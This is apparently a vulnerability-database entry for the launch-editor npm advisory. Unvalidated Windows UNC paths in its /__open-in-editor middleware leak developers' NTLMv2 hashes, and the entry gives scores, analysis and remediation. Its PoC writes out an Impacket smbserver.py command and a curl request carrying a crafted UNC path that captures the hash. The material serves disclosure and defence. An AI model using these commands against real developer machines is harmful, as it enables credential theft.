Severity by source
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N for network-initiated attack via HTTP; AC:H for multiple required coincident conditions (Windows, NTLM enabled, dev server running, attacker-known URL); UI:R because victim must visit attacker's page; C:H for NTLMv2 hash disclosure; no integrity or availability impact.
Primary rating from Vendor (https://github.com/vitejs/launch-editor).
CVSS VectorVendor: https://github.com/vitejs/launch-editor
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3Blast Radius
ecosystem impact- 46,771 npm packages depend on launch-editor (530 direct, 46,262 indirect)
- 32 npm packages depend on vite (28 direct, 4 indirect)
- 14 npm packages depend on vite-plus (10 direct, 4 indirect)
Ecosystem-wide dependent count for version 2.14.1 and other introduced versions.
DescriptionCVE.org
Summary
The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.
Impact
If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the launch-editor:
- using Windows
- NTLM is not disabled (it is recommended to disable, while it's still enabled by default)
- the user accesses the attackers website that sends request to a middleware using
launch-editor - the server that has the middleware using
launch-editoris running - the attacker knows the URL for that server and the middleware
This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.
Details
launch-editor accepts file paths without validating or restricting Windows UNC paths such as:
\\attacker-host\shareOn Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.
If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.
The attacker could target a developer that uses a development server using launch-editor to develop code locally, send them a link and grab their NTLMv2 hash.
PoC
From the attacker side, we will setup an SMB server. I personally used Impacket's smbserver.py, but you could use something like Responder for this as well. For keeping it simple, we will use smbserver.py here.
First, let's create a directory to serve as an SMB share.
mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txtThen, start the SMB server.
$ sudo smbserver.py -smb2support -debug share /tmp/dataNow, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally (vite).
Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use curl to achieve the same.
curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of smbserver.py and see the NTLMv2 hash coming in.
<img width="1916" height="277" alt="2026-01-30_10-58" src="https://github.com/user-attachments/assets/2f606e8f-c9bb-41dc-b507-ea6606b53368" />
AnalysisAI
NTLMv2 hash disclosure in the launch-editor NPM package (v2.14.0 and earlier) exposes developer credentials on Windows systems when an attacker-controlled UNC path is passed to the package's file-opening HTTP middleware. The attack is achievable by tricking a developer running a local development server such as Vite into visiting an attacker-controlled webpage that issues a cross-origin request to the local __open-in-editor endpoint with a crafted \\attacker-host\share UNC path, whereupon Windows automatically initiates NTLM authentication without any user prompt, transmitting the victim's NTLMv2 hash to the attacker's SMB server. Publicly available exploit code confirmed via the advisory PoC using Impacket smbserver.py and Responder lowers the barrier significantly; no active exploitation has been confirmed via CISA KEV at time of analysis.
Technical ContextAI
The launch-editor package (pkg:npm/launch-editor) is a development-time utility that opens source files in editors from within a running browser application; Vite and similar tools expose it via an HTTP middleware endpoint such as /__open-in-editor. The root cause is CWE-73 (External Control of File Name or Path): the package accepts the file query parameter value and passes it directly to the editor-opening logic without validating or blocking Windows UNC paths of the form \\host\share. On Windows, any attempt to access a UNC path causes the OS to initiate an SMBv2 authentication handshake to the specified host, automatically sending the logged-in user's NTLMv2 challenge-response hash - a known Windows authentication coercion technique exploited by tools such as Responder and Impacket. Because NTLM is enabled by default in Windows (despite Microsoft's ongoing phase-out guidance), the hash is transmitted silently and without user warning. The vulnerability propagates through the dependency tree to any project bundling launch-editor, most notably Vite (pkg:npm/vite) and vite-plus (pkg:npm/vite-plus), making developer workstations the primary attack surface.
RemediationAI
The primary remediation is to upgrade launch-editor to version 2.14.1 or later, which introduces UNC path validation to block this attack class. For Vite users, upgrading to the fixed Vite release automatically pulls in the patched launch-editor: use Vite 6.4.3 for the 6.x branch, Vite 7.3.5 for the 7.x branch, or Vite 8.0.16 for the 8.x branch. Full advisory details are at https://github.com/vitejs/launch-editor/security/advisories/GHSA-v6wh-96g9-6wx3. Where immediate patching is not possible, the most effective OS-level compensating control is to disable NTLM on developer workstations per Microsoft's guidance at https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526; this blocks the authentication coercion entirely but may break legacy application compatibility requiring prior testing. A network-level control is to block outbound SMB traffic (TCP 445) from developer machines to untrusted external hosts via host-based or perimeter firewall rules, which prevents the NTLM handshake from reaching an attacker's server without fixing the root path-validation flaw. Additionally, the dev server's __open-in-editor middleware should never be exposed beyond localhost; binding the dev server to 127.0.0.1 and enforcing this with a host firewall reduces the attack surface even if the package remains temporarily unpatched, since it prevents the attacker from directly reaching the endpoint from outside the local machine (though the SSRF-via-browser vector still applies).
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-73 – External Control of File Name or Path
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38299
GHSA-v6wh-96g9-6wx3